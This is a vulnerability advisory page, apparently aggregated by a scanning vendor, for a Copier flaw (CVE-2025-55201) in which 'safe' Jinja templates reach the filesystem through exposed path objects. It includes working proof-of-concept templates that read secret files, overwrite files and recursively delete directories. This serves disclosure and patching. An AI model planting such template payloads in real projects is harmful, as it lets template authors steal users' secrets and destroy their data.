Copier's safe template has arbitrary filesystem read/write access
Copier's current security model shall restrict filesystem access through Jinja:
{% include ... %}, which is limited by Jinja to reading files from the subtree of the local template clone in our case.Copier suggests that it's safe to generate a project from a safe template, i.e. one that doesn't use [unsafe](https://copier.readthedocs.io/en/stable/configuring/#unsafe) features like custom Jinja extensions which would require passing the --UNSAFE,--trust flag. As it turns out, a safe template can currently read and write arbitrary files because we expose a few pathlib.Path objects in the Jinja context which have unconstrained I/O methods. This effectively renders our security model w.r.t. filesystem access useless.
Imagine, e.g., a malicious template author who creates a template that reads SSH keys or other secrets from well-known locations, perhaps "masks" them with Base64 encoding to reduce detection risk, and hopes for a user to push the generated project to a public location like [github.com](http://github.com/) where the template author can extract the secrets.
Reproducible example:
```shell
echo "s3cr3t" > secret.txt
mkdir src/
echo "stolen secret: {{ (_copier_conf.dst_path / '..' / 'secret.txt').resolve().read_text('utf-8') }}" > src/stolen-secret.txt.jinja
uvx copier copy src/ dst/
cat dst/stolen-secret.txt
```
```shell
mkdir secrets/
echo "s3cr3t #1" > secrets/secret1.txt
echo "s3cr3t #2" > secrets/secret2.txt
mkdir src/
cat <<'EOF' > src/stolen-secrets.txt.jinja
stolen secrets:
{% set parent = (_copier_conf.dst_path / '..' / 'secrets').resolve() %}
{% for f in parent.glob('*.txt') %}
{{ f }}: {{ f.read_text('utf-8') }}
{% endfor %}
EOF
uvx copier copy src/ dst/
cat dst/stolen-secrets.txt
```
Imagine, e.g., a malicious template author who creates a template that overwrites or even deletes files to cause havoc.
Reproducible examples:
```shell
echo "s3cr3t" > secret.txt
mkdir src/
echo "{{ (_copier_conf.dst_path / '..' / 'secret.txt').resolve().write_text('OVERWRITTEN', 'utf-8') }}" > src/malicious.txt.jinja
uvx copier copy src/ dst/
cat secret.txt
```
```shell
echo "s3cr3t" > secret.txt
mkdir src/
cat <<'EOF' > src/malicious.txt.jinja
{% set parent = (_copier_conf.dst_path / '..').resolve() %}
{% for f in (parent.glob('*.txt') | list) %}
{{ f.write_text('OVERWRITTEN', 'utf-8') }}
{% endfor %}
EOF
uvx copier copy src/ dst/
cat secret.txt
```
```shell
echo "s3cr3t" > secret.txt
mkdir src/
cat <<'EOF' > src/malicious.txt.jinja
{% set parent = (_copier_conf.dst_path / '..').resolve() %}
{% for f in (parent.glob('*.txt') | list) %}
{{ f.unlink() }}
{% endfor %}
EOF
uvx copier copy src/ dst/
cat secret.txt
```
```shell
mkdir data
mkdir data/a
mkdir data/a/b
echo "foo" > data/foo.txt
echo "bar" > data/a/bar.txt
echo "baz" > data/a/b/baz.txt
tree data/
mkdir src/
cat <<'EOF' > src/malicious.txt.jinja
{% set parent = (_copier_conf.dst_path / '..' / 'data').resolve() %}
{% for root, dirs, files in parent.walk(top_down=False) %}
{% for name in files %}
{{ (root / name).unlink() }}
{% endfor %}
{% for name in dirs %}
{{ (root / name).rmdir() }}
{% endfor %}
{% endfor %}
EOF
uvx copier copy src/ dst/
tree data/
```
This issue can be reached with local access to the system, attack complexity is low, an attacker needs no privileges on the target. A user must be tricked into taking some action. Rated impact: confidentiality high, integrity high, availability high.
The score comes from this vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
CVE-2025-55201 is classified as CWE-22: Path Traversal. A file path built from user input is not confined to the intended directory, letting an attacker reach files elsewhere on the filesystem.
CVE-2025-55201 is recorded against 2 packages.
Published on 7 July 2026. No public exploit is currently recorded for this entry. Record sourced from NVD.
github.com (Web)
nvd.nist.gov (Advisory)
github.com (Web)
github.com (Package)
pypi.org (Package)
github.com (Advisory)
copier has other advisories on record. If you are patching this one, these are worth checking on the same host:
These advisories are the same class of weakness (CWE-22: Path Traversal) in other software:
Details
CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
Affected Packages
| Software | From version | Fixed in |
|---|---|---|
| copier | — | 9.9.1 |
| unknown | — | — |
References
Similar Threats
Site Security Check
CVE-2025-55201 is rated CVSS 8.0 High. BotEraser scans your installation against known CVE records and tells you whether this vulnerability applies to the versions you actually run.
Scan My Site Free →No credit card required · Results in minutes
ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the vulnerabilities listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.
Stay up to date with the latest from Boteraser.
We use cookies to improve your experience on our site. By using our site, you consent to cookies.
Manage your cookie preferences below:
Essential cookies enable basic functions and are necessary for the proper function of the website.
CloudFlare provides web performance and security solutions, enhancing site speed and protecting against threats.
Service URL: developers.cloudflare.com (opens in a new window)
These cookies are needed for adding comments on this website.
These cookies are used for managing login functionality on this website.
Statistics cookies collect information anonymously. This information helps us understand how visitors use our website.
Google Analytics is a powerful tool that tracks and analyzes website traffic for informed marketing decisions.
Service URL: policies.google.com (opens in a new window)
You can find more information in our Cookie Policy and Privacy Policy.